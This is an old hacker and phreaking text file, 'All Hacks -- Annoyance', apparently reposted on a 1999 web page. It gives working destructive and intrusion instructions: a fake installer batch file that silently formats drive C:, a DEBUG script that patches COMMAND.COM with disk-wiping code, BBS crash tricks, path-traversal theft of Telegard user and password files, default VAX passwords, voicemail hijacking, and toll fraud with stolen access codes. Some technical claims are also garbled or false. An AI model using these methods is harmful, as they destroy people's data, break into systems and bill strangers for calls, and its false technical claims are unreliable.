Click here to find books related to 'hackers'.

* * * All Hacks -- Annoyance * * * Vol.1\Issue 1 Aha° ~=- Background History ~=- Aha was founded by Firewalker. Firewalker is in NO WAY held liable for these hacks/flaws/phreaks/access codes. This file could contain, wrong information, or, worse, mistakes! I am in no way (the editor) saying that all of these work. Aha was started because there wasn't anything better to do, heaven forbid! Firewalker can be found on most pirate boards, and a few of the public access ones too. Contact him, internet, at: or, contact his bulletin board at -- (303) 747-2088. ~=- Lets get started ~=- If we must! Geesh.. One known bbs hack, to pretty much everyone in the United States, is the device driver uploads. --- Some could be asking right now "whats a device driver?" Well, for those of you that are asking: Don't you know anything?! A device driver is a form of TSR, that requires alot more than just a memory area. Such as QEMM386.SYS CON, COM1¨, COM2¨, LPT1˙, LPT2˙, CLOCK$, and others...To get your device driver listing, using MS-DOS 3.xx and up, type: MEM /D which shows memory in debug format (don't worry, its easy to understand after a few times of doing it) The Uploading of device drivers has been known to most hackers for along time, ever since WWIV 1.0 came out (long time ago!) This only works on some boards however, and I have only tested it on these software packages: o Telegard (all versions) o WWIV (till version 4.20) o PC Board version 14 o Ultra (some, but not all versions) ask, what good is this stuff? Well, its very interesting, if you take down someone you really don't likes board, just by up- loading a file? Try it on some local boards! Some problems: o Alot of the sysop logs show you loging on, and uploading that file(s) -- Use a false account. o If sysop is running a mailer, such as FrontDoor, or Binkly, Your out of luck, their system will just rest o If sysop has his loading batch file rest the board, you lost. o If sysop is running Watch Dog, Watch Cat, Watch Com, or Watch Man, his system will be reset. ¨ | Some text files are not true, saying that COM 1-6 works, the comports that will work are 1-2, none others. ˙ | Some text files are not true, saying that LPT 1-4 works, the printerports that work are 1-2 only! ~=- The Clock$ Hoax: ~=- Some systems have protected agenst uploads of CLOCK$ or COMX, or whatever you desire, well, I still like to upload files like that. This takes alittle more time, but still is alot of fun: take a simple textfile, and zip it, but make sure the zip is no bigger than 6k! The filename, (Please only one at a time) must be 6 chars, then...Use debug, diskedit, hex2edit, or whatever you use to decode .EXE or .COM files, in the zip file, you will see your file name as one of the first things, simply change the file name to clock$.$$$, and as soon as the poor, unexpecting sysop unzips it it sends that text file to his CMOS, instantly reblowing someones system, pain in the butt to fix. But, if the sysop is smart enough (I haven't met many that are) they will know how to fix CMOS. Reupload the file, but this time, make sure its out, have him on vacation, and upload this file, with a different name, but, use V-iew an archive (Telegard, WWIV, ULTRA, PC-BOARD), and view your poor unexpecting file, and he just lost his CMOS again, but if he is on that 6 week vacation, then, his board just lost alot of usage. --This also works for the NEW version of WWIV--4.20 and 4.21a! --Sysops- To protect from CLOCK$ and all other device drivers, have a batch file, to start up your board, @ECHO=OFF begin CD\BBS BBS goto begin and make all uploads go to a Sysop Directory, so that people can't turn around and view those stupid files. ~=- That doesn't work! ~=- If that doesn't get a sysop mad, try something like this, creat a file, usally LOGOFF.BAT (WWIV, TELEGARD) and have it move itself to the main bbs directory, have it be a RUNME.BAT file for the sysop to run even, In this file, have these commands: @echo off echo Installing. . . Wait. rem Don't make it look like a hoax! echo Y | FORMAT C: > nul rem which means, format, but answer the question yes! with no echo Look nice and mean? This really works. Remember, this is for hacking purposes only. (grin) To fix: get a program that disallows a format of C:, like Robert March's non-format. ~=- The virus: ~=- Whatta mean that last thing doesn't work? Thats 'per childs play. How about this type of file: Make a batch file (sorry, this is hard) use this text: ----> Cut Line <---- @echo off cls echo e cs:0100 b4 19 cd 21 b9 09 00 33 d2 cd 26 > ~~temp.~tp echo w >> ~~temp.~tp echo q >> ~~temp.~tp debug %1 < ~~temp.~tp > nul erase ~~temp.~tp > nul ----> Cut Line <---- (Note, this isn't nice) Then run this file on a .COM or .EXE file you may have, COMMAND.COM is the funnest (Make sure you got a System Disk handy!) ~=- The Beeping Message ~=- Most BBS software support, either an OFFLINE READER, or uploading of messages, such as RA, and if, they allow anything besides Ascii protocol, then you got it made, you then upload a file with 200 (or whatever the limit is, with Remote Access its unlimited, right?) lines of BEEPS!!!! Using the ^G in Copy con, or ALT-7 in a full screen editor. Heres a pascal program that will do it for you, so you don't have to spend the time working on it. )CUT( Uses Crt, DOS; label beepit; var fname : text; begin writeln ('Running. . .'); beepit: fname := 'beeper.msg'; write (fname, chr(7)); goto beepit; end. )CUT( Then upload beeper.msg, and watch the fun begin, as 200 lines of beeps are being used each time a user reads that stupid message!!! ~=- WWIV (Under 4.20) ~=- WWIV is one of the easyest boards in the world to hack now, here are a few known hacks, with some help from me, you could be trashing someones system in less than an hour. Uploading of CLOCK$, COM1, COM2, LPT1, LPT2, or, CON. Uploading of a mislead file, such as HACKED.TXT zipped in a file called, using DEBUG to modify WORK.ZIP and change the filename: Hacked.txt to ClOcK$.$$$ or ClOcK$.TxT (case doesn't matter, just make it look like a real hack) Uploading a file, then redownloading it, (Note, this is only available if its a device driver (maximum ouch!)) Uploading a message with 100 lines of beeps. (thats an ouch!) If, Somehow, you had ELSEWERE installed on a remote system (major hack!) you could then control their keyboard (such as, F9, temp sysop!) ELSEWERE is on many boards, get it, you'll love it! Having an unexpecting person (such as a father, mother, sister, brother) typing F9 for you on that end (Ok, so thats not a hack, but once you got sysop access you can party!) If you know the Sysops personal password, then logon using this: LOGON: 1 PASSWORD: RANDOM (Sysops Password) PHONE NUMBER: ###-###-0000 (The phone is usally the sysops home number) SY: (HANG UP HERE, THIS WILL CRASH THE BOARD!!!) Thats all for WWIV, unless I get some mail asking for some more. ~=- Remote Access (Version 1.10, 1.11, 1.11+) ~=- Remote Access is alittle harder than WWIV to hack, I would tell most WWIV sysops to either use Remote Access (RA) or Telegard, not as easy to hack and alot better on both the sysop and the users end. Back to the hacks! When using R.A. Version 1.10, it is really tempting to type ALT-200 (╚) and get sysop access! Yes folks! Thats it! If you find a RA 1.10 board you logon, and type ALT-200! You then have sysop access! But..Its even more temping if you enter these commands in a message adljhkadasduhiadjkasdhjÄsadkjhadkj▓akjasdkjlas0+ Then save it. The message section could be distroyed! This goes for all versions of Remote Access (as far as I know) The Beeps are another fun trick, uploading a message full of beeps (try the sysop, see how quick his CTL-ALT-DEL fingers are.) Remote Access lets you have 300 lines, thats alot of beeps! Or, even better, the Remote Access off line message reader, Blue Wave! upload them that way, Its alot funner. ~=- Telegard 2.5 ~=- Telegard isn't hard to hack. If you find a Telegard 2.5 bulletin board, I want the number, mail it to me via internet: !NOW! If, you logon as a new user, but with the sysops name/alias+ anumber on as the alias (I.E. Firewalker1) then you will have a sysop account, without the sysop even knowing, read the private E-Mail, and even drop to Mini Dos! Some of the joys of knowing about Telegard 2.5 system is seeing how quick a sysop can catch on! There are others, such as the Archive Menu, Telegard 2.5 never hid the archive menu, which means, you could do a "/D" (download) of this file: ..\..\STATUS.DAT, and get all the pathnames, as well as the System Password, which would allow you to, if, 1, you had the sysops personal password, logon as him, and trash his system. 2, Lock out a few people you don't like! Once you have the path names (can be viewed just by typing them, they would look like: C:\BBS C:\BBS\GFILES C:\BBS\AFILES etc..etc.. You can download the USER LIST. The most important file using telegard, by downloading, this time: C:\BBS\GFILES\USER.LST Now, some sysops know about this, and will try to fool you, by switching the General Files (G-Files) with the All Files (A-files) section. You then, just download with a different pathname. Or, heck, make an off line archive using the archive menu, and have it include those files, sometimes, if the sysop is dumb enough (I have seen many) they will allow pathnames in archives, so you can get those two important files any day of the year you want and keep loging in as the sysop, and doing this: * (from the main menu, usally takes you to the Sysop Menu) P (from the Sysop menu, takes you to the System Config) System Password: (enter the system password here) System Configuration A. Modem configuration B. File paths & BBS configuration C. System ACS settings D. System variables E. System flagged functions F. File system configuration G. New user and auto-validation settings H. Miscellaneous configuration I. Network configuration J. String configuration K. Default colors 1. Time limitations 2. Call allowance/day 3. UL/DL # files ratio 4. UL/DL K-bytes ratio 5. Post/call ratio Then type C, then change the security levels accordingly. The Message Beeps, Don't forget those! If you have a Co-Sysop account on a telegard board (2.4, 2.5, 2.7) you can upload the Status.dat, using this command: (write a message, say to a buddy of yours) / COMMAND? U Upload: Filename: STATUS.DAT Whopps.. You now have the status.dat file.. scary for a sysop. ~=- Flaws in other Files: ~=- I have seen some so called "Hacking files" in the past, that are like this one. But never showing you the hacks, they just tell you that there are hacks, well, I already knew that much. I wanted to thank Tot, for helping me out with the Remote Access hacks. There are a few I haven't told in this file, I might in the next, if I get a cry for another update, or whatever. I have seen, Hackers Unlimited Mag. By Mickey Mouse Club (MMC) This file IS a flaw, according to this so called file, TeleConferencing is not charged to a phone bill, and maybe used to dial people in far away places and talk to them all at once. Well....Dark Lord...And who ever helped out with that: 0-700-456-1000 (Teleconferencing, without the operator) does not work! I have a $1,700 phone bill that maybe you would like to take care of? Warning, don't believe anybody that says, You can call long distance for free using this number... Duh... No. You can't. The Phone Company is alot smarter and would not allow such stuff! Now, there is one true thing in the Hackers Unlimited Mag, that is about 950.1001 numbers They are valid, but once you find an access code, they are charged to the company, or even maybe the phone company, if you get the right access codes. with 950-1001, its a 6 digit access code you are looking for. Play around with it, But, besure you don't rack someones phone bill up to $2,000! (Who knows, it could be MY access code your using.) Here is the format for 950-1001 numbers: Dial in, when you hear a dialtone enter: 0000003037472088 -- This would call, my bulletin board. ^^^^^ Put an access code here Or, for using this with Modems, enter: 950-1001,,,,000000-303-747-2088 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Access Pause accesscode+area code+phone number ~=- Relay Systems ~=- Thats about it on Access codes. But, say you can't sleep at 2 am. And all the boards are busy, because no one else can sleep either, why not call and talk with an operator? Yes..Operators like to be talked to too. But..Why call and talk to just any ole operator voice? How about dialing up the Colorado Relay (if you live in Colorado)? (I will list the numbers here in a second) Once in, its fairly easy to use, The operator will say something like, Colorado Relay service: This is agent xxx speaking, GA (GA = Go Ahead) You just say something like: hello agent xxx! This is How are you feeling today? I wasn't able to sleep, and all my family is asleep, want to talk? GA (do this when your done talking) If he says no, then hang up, and try again, you will get a different agent everytime! (There are over 999 agents!) Oh.. For those of you who don't know what a "Relay" is, its a device for the deaf to call and then an operator will answer (this is done by computer of corse) and, you/the hearing impared person would beable to call and talk to his/her family via, operator. You would type what you want to say, and the operator would speak it (or, sometimes, the computer talks as you type it out) And then whatever the remote person says the operator types (or the computer can translate it to your screen). Have some fun with this! You could call up a buddy, and talk, say in code, so the operators don't know what your saying, sometimes, you can say, Oh...Just a moment I will plug in my TDD, and then turn on your modem, and you can type back and forth, although this does not charge, unless you dial longdistance (heaven forbid!) please don't abuse it, people have put time and money for the hearing impared, and you should not take that for granted. Enough said, heres the number: 1-800-659-2656 (Colorado Relay) 1-800-659-2656 (Wyoming, Texas, and Missouri Relay) If you are not in those above states, call your directory assistance (1-800-555-1212) for the Relay system. All states have them. And they are NEVER busy. So give it a shot! While your asking for the number, ask them if they know if a modem will connect, to be sure, unless you don't feel right about that, try it yourself. You will hear a 300 baud type beep, for only 20 or so seconds, then you will connect 2400/1200/300. Have fun. ~=- VMB (Voice Mail Box) ~=- Probably one of the SAFEST telephone usage anywhere! Voice mailbox numbers are posted every where! You can even find some writen on bulletin boards for validation. (The bigger ones) How would you like your own voice mail box? Its pretty easy to get, just call up an operator, ask how to get a Voice Mail Box... Just kidding. If you have a valid voice mail box number (alot of hackers will post a vmb number, and the password on the pirate boards, sometimes it will be HIS!), once the person starts talking push the pound sign (#) and then it should say, Enter Your Box Number: You enter the number given to you, or we'll say 333. 333...enter your password...hmm..this is tricky. Some passwords are: Box number: 333 Box # + 1 : 334 Box # - 1 : 332 Box # + 0 : 0333 Box # x 2 : 666 Once you entered the correct password, they will give you choices: Press 1 if you want to read your mail Press 2 if you want to make a box under yours Press 3 if you want to change your password Press 4 if you want to record a new message Press 0 if you want to speak with the operator Then choose 2: You will then be given a box, up to five can be put on each, which means, you make yourself a box, and can have 5 people under you. Its a never ending loop! Make your password default, your box number, so that other hackers can use the same method. (lets be nice to our fellow hackers, if it wernt for me, would you have this file?) VMB's can be used for alot of things, you can use them for sysops to validate you for FREE if you call long distance! (Usally they are 1-800 numbers!) You can sell them to other hackers! (Make some money with this hacking bit!) There are many many more uses for VMBs, you could talk across them ..Anything! ~=- Call Back Verifyers: ~=- Don't you hate those things? And worse...The sysop never gives you access unless you run that? What if it doesn't verify long distance and you are calling long distance? Wanna get back at those stupid Sysops? For your phone number, in the call back verifyer, enter this number: 102-880-,,,, (Which is At&T Long distance service! They get charged!) or 103-333-,,,, (Sprints version of it.) Thats only one way to make a sysop mad... There are more, like making the Call Back verifyer dial a 900 number! or a 960 number! Ever think about it? as your number you have 900-537-2323, and they get charged a nine hundred call when they dial it. Whopps.. Sorry there old buddy. You shouldn't have locked me out? Hahahahaha. ~=- 3rd Party Calling ~=- Perhaps one of the funnest things in the telephone world! Call up your friends..Charge it 3rd party from a credit card phone (Most are in the airports, they allow you to do that without a yes or no answer!!!) But...Don't put it on someone elses bill! Put it on yours! Then when you get your phone bill (panic city right?) Call up AT&T or your long distance carrier, and tell them you didn't make those calls. They will be removed from your phone bill (do this with caution, some phone companys might NOT remove them!) and you got a free long distance call...Third party style! ~=- U.S. Postal Service ~=- Still as fun as it always was! Say...You want to write a letter to someone. But...Man. You just ran out of stamps, and spent your last 5 bucks on gas..bummer. Oh-well.. How about making the return address to the person your sending it to. And your address to make it look like your sending it to someone, but its really yourself. Here, easyer Shown that done. _________________________________________________________________ | Jane Doe | | 555 Chesnut St. <-- My girlfriend '-----' | | Washington, New York My address :No : | | 31456 | :Stamp: | | v ,-----, | | John Doe | | 555 Chesnut St. | | Washington, New York | | 31456 | | | |_________________________________________________________________| Insted of me putting MY address in the corner, I switch the two, so, without a stamp, the post office sends it back, but...little do they know. They are really sending it to where it has to go! ~=- Unix, and Vax type systems ~=- VAX: The VAX acronym is derived from Virtual Address eXtension. The VAX computer is designed to use memory addresses beyond the hardware's actual limits, enabling it to handle pro- grams that are too large to fit into physical memory. The VAX computer system is a member of the Digital Equipment Corporation (DEC) computer family. Currently the VAX series includes models spanning the desktop VAX station to mainframe class multi-CPU VAX processors. These vary from the superminis, like MicroVAX, to the older, moderate sized 11/7XX series, to the newer 6000 series. These computer systems commonly use an operating system known as VMS. VMS: The VMS acronym is for Virtual Memory System. The operands of VMS are very similar to other operating systems. Back in the days of stand-alone computer systems, DEC had the idea for streamlining the operation of their computers for business and engineering. It conceived VMS as a way of allowing the basic computer management to be done by a user familiar with any of the multiple systems it made. DCL: The DCL acronym is for Digital Command Language. It is the fundamental language of the VMS. Those of you who have an IBM system, you can think of a DCL program like a batch file. You can do a lot with it (much more than a PC-DOS or MS-DOS batch) but it work basically the same way. One difference is that when you want to execute anything as if you were typing it in at the command prompt, you first must put a "$" in front of the command in the DCL program. DCL programs are commonly called COM files as well. When you are not executing a COM or DCL program file, you are almost always typing things into the DCL processor. WHAT DOES A VAX LOOK LIKE: (quickly) ========================= When you log into a VAX, you will see something similar to the following: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: WELCOME TO THE AT&T MICROVAX II SYSTEM Username: (username here) Password: (password here... does not echo) $ (<-- this is your prompt) ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: You will know if you have a VAX type system if you get the "Username:" and "Password:" prompts. Anything is just extra that helps you guess passwords. GETTING IN A VAX BY ERROR: ========================= I will only tell you one thing here. VMS 4.X and especially VMS4.4 are goldmines. I am not going to go into this at all, because it is a lengthy explanation that doesn't fit in the scope of this message. You can find this discussion on ARPANET and USENET. You can also get this information on CompuServe Information Service, BYTE Information Exchange, and Digital Electronics Corporation's VAX BBS. There is also a big problem with VMS 5.1, but that doesn't involve getting in. If there are enough requests, I will cover this information in another mes- sage. GETTING IN A VAX BY DEFAULT: =========================== There are several default accounts that were put in by DEC when testing and installing the VAX. These accounts have pass- words which don't change from system to system. The SYSOP should have removed these accounts or changed the passwords, but it is not done a lot of times. Below, I have listed several defaults: USERNAME PASSWORD -------- -------- DECNET DECNET * SYSTEST UETP SYSTEST SYSTEM SYSTEM DEFAULT DEFAULT * FIELD FIELD OPERATIONS OPERATIONS * SUPPORT SUPPORT DEC SYSTEST_CLIG CLIG SYSTEST TEST Where I have listed several passwords, I have found the re- spective usernames passworded that way as much as the default password. The accounts with asterisks beside them are powerful accounts by default. VAX VMS COMMANDS: ================ Once you get your "$" prompt, you will be able to type in hundreds of commands of course. I will go over a few basic ones here: @ - Execute procedure. When you want to run any DCL batch or *.COM;* file, you must include this "@" before the filename. EX: @LOGIN.COM;3 ACCOUNTING - This will run the accounting program. If you log out of a system and you see charges put on your account for the amount of time you are on, the system is using account. Actual- ly every system uses accounting somewhat, but it can be made virtually invisible. If you are desperate, or you are having troubles with the system operators of the VAX (SYSOPS from now on), you can use this program to your advantage. CREATE - This will create just about anything. If you have a program that you have written on your PC's Pascal interpreter, you can Ascii upload the file to the VAX using the CREATE command. EX: CREATE program.pas;1 CREATE/DIR - This will simply create a SUB directory for you. I will explain how to get around a VAX in a minute. See the SET command. EX: CREATE/DIR NameOfDir DELETE - Just used to delete a file or EMPTY, UNPRO- TECTED DIRECTORY. To delete a file, just type "DEL filename.ext;x." To delete a sub directory, first delete all of the files in the directory: "DEL/LOG *.*;*" Next, you will need to SET PROTECTION: "SET PROTECTION=OWNER:D dirname.DIR" Next, delete the directory: "DEL dirname.DIR" EX: DEL DAVID.TXT;4 DIRECTORY - This will show you what files are contained in the current directory. Adding "/BRIEF" will give you a short listing and adding "/FULL" will give you a full listing includ- ing security information on each file. You can shorten the command to DIR and you may use wildcards. The "*" means anything of any length. The "%" means anything one character length. EX: DIR/FULL DAVID-%%.*;% EDIT - This command will bring up the editor. Some VAX systems use a type of editor similar to MS-DOS/PC-DOS's EDLIN. HOWEVER, some VAX systems use EDT/EVE editing which is a full screen editor (usually). With this editor, you can do a lot quickly, but only if your terminal will support cursor control. VT-100 is very clumsy. Try getting VT-220 when you use the EDT/EVE editor. HELP - This command will bring up the HELP program. This is just a clumsy imitation of what you are reading. (heh heh) LIBRARY - Used for archive purposes. You will proba- bly not use this command much if you are new. I am mentioning it now because I will type up a more in depth discussion of VAX later on the "What's Hacking?" sub boards. LOGOUT - Logs you out. MAIL - Loads the mail program. Used to send mail to others users and CAN (YES, IT CAN) be used to send mail (or other) to (OR FROM) the network if the VAX is connected to a network. It CAN (YES, CAN) also send data to (OR FROM) the computers on the DECNET (if used). $PASSWORD - Changes your password. EX: $PASSWORD mynewpass PHONE - Used to talk to another user. This command is pretty nice compared to other means. Your "$" prompt will be replaced with a "%" prompt once phone is executed. If you want to talk to someone, type his username. If you want to talk to someone on a different node, type his nodename, two colons, and then his user- name. A lot of times you will find this one disabled (especially on University computers), but there are alternate ways to communication online other than MAIL and PHONE. See below. EX: PHONE % node13::dlight PHOTO - Records session. RUN - Executes executables. (simple?) SET - Wow... this is a lot. See below. SHOW - This involves a lot too, but not as much as SET. With SHOW, you can look at a lot. I am just going to list a lot of things you can view and what it will show you. EX: SHOW USERS DAV CLUSTER - VAX cluster if any DEFAULT - Directory path and device DEVICES - The system devices (drives, etc.) INTRUSION - If any accounts are being hacked MEMORY - Memory of course NETWORK - Network and the VAX's location within PROCESS - PROCESS ProcessName shows status PROTECTION - Protection on files QUOTA - Shows disk space allowed for your account SYSTEM - Miscellaneous system info DAY - Day & date TIME - Time USERS - Users online all systems TYPE - Shows the contents of a file by sending it to the terminal. EX: TYPE DAVID.TXT;3 THE SET COMMAND: =============== The SET command is one of the most widely used and versatile commands on the VMS 5 series DCL. SET FILE/PROTECTION: =================== I suppose the most frequent use of SET involved the PROTECTION option. These protections, known as SOGW or UIC protections, can be put on any file or directory that you have WRITE & EXECUTE privileges on. Setting the protection involves allowing differ- ent users on the VAX to read, write, execute, or delete your file or directory. The FILE /PROTECTION option of SET is used to accomplish this. An example is: SET FILE/PROTECTION=OWNER:E david.exe;4 If you typed this command in the DCL for a program called DAVID.EXE;4 (4 is the version number), then the owner (or crea- tor) of the file can do nothing to the file but execute it. However, in another example: SET FILE/PROTECTION=OWNER:RWED david.exe;4 you are going to be able to "R"ead, "W"rite, "E"xecute, and "D"elete the program. The same applies to a directory. Just substitute the directory name for the filename above. When creating a directory, the SET is set so that you may not delete it. As discussed previously, you will have to issue a "SET PROTECTION OWNER:D dirname.dir;1" and "DEL dirname.dir;1" to delete the directory. Other than the owner, UIC file protection can be placed on any of the following: WORLD - Any user on the system. GROUP - Any user in your group. OWNER - Only your account or matching UIC. SYSTEM - Anyone that has SYSPRV privileges c:\dtdosbbs ~=- MCI ~=- MCI is the Queen Mother of the long distance companys. There are only a handful of companys that are "networked". This means they've built their system to a point where travelers (or phreaks can call into a local phone number and be in the "network" even if they're three thousand miles from home. The exception is when you're in an area that isn't serviced. Most LD services utilize 800 numbers so that you can connect even if you're out in the boonies. Here we have two different code formats, one for the so called "executive" user, primarily business, the other for the average person. Executive class entails using the 950-1022 dialup. To make a call you need to enter no less #than thirty two digits. You dial zero plus the area code and phone number that you want, then the area code and phone number with a four digit "security code" at the end. It'll look like this, 9501022 (the dialup) 02125551212 (zero plus the area code and phone number ) then 7045551212xxxx (your area code,p#hone number and security code). Many years ago I saw a piece of graffiti on the bathroom wall of the Cotton Bowl. It went like this, "I've craped in England - I've craped in France - But before I crap here again - I'll crap in my pants." I feel the same way about this format. As a businessman, I wouldn't waste my time trying to dial all this garbage. A real pain in the butt. Hackers, don't find the format that tough. With the exception of the user's telephone number and code the rest are known quantities. You're left with fourteen numbers to hack out. This can be reduced even further. MCI's 950 codes are good anywhere in the country. Experienced phreaks pick an area that is known to have an extremely high population density. New York City is a case in points, area code 212. The number of digits has just been reduced to eleven. The phreak will choose a prefix that is occupied #predominantly by business and cut the number down to eight digits, which is one less than Sprint's code. I've seen 425,943,344,964,269,422,820,227,635,747,486,668,686,233,248,532, 732,306,938,255,925,678,and 564 posted on hacker boards. It seems that Wall Street is a juicy target. The interesting thing about hacking MCI's 950 numbers is that the phreak also gets the number of the person who's going to be getting the bill. It's not unusual for the hacker to call the victim on some pretense just to find out who it is. If it's a large company who might not notice a few additional phone calls, he'll use the code sparingly so as not to attract attention. The end result will be years of free long distance. Some psychologists say that names can affect the development of a child. I knew two kids when I was in school who's names are etched in my memory forever, Jock Strap and Harry Balls. Their parents should have been shot. The president of MCI is Orville Wright. Orville has his work cut out for him. -- For now..This is Firewalker..saying happy -- Hacking Annoying Cool Kid! --I'll be back! All Hacks Annoyance Staff: Editor - Midnight Walker - BBS Line - 772-8549 aka Slider Writer - Firewalker - BBS Line - 747-2088 Passed thru: --------------------------------------------------------------------------- -: ThE pArK BBS :- --! Specialising on Anarchy textphiles, phone phun and odd ideas... !-- Running Reccoon!300-16.8DST speed!+46 (0)570-770033!LoadsOfPyro/Phreak/ Anarchy-Philes!Chem&PyroShop!2:203/608!SysOp:PHiGARO!OnlyCoolDudes?! 120Mb!WeAnswerAllPyrotechnicalQuestions!OnlyAmigaMakesItPossible!CCsupport !UngaForskareSupport!KeboLicens!Schematics!AllWeNeedIsYourHandle&PhoneNo.! ->Unique drugarea!<- ->Supporting HSI-Net<- ---------------------------------------------------------------------------

This page was created Wed Aug 11 02:03:18 EDT 1999
Using Linux version 2.0.32 on an i586

Main Page @ Acquiring Account Information @       Symantec Act! 2 for Windows @      

All hacks / Annoyance @       The Matarese Circle @      

QueSO Test Drive @      

Copyright (C) 1999 -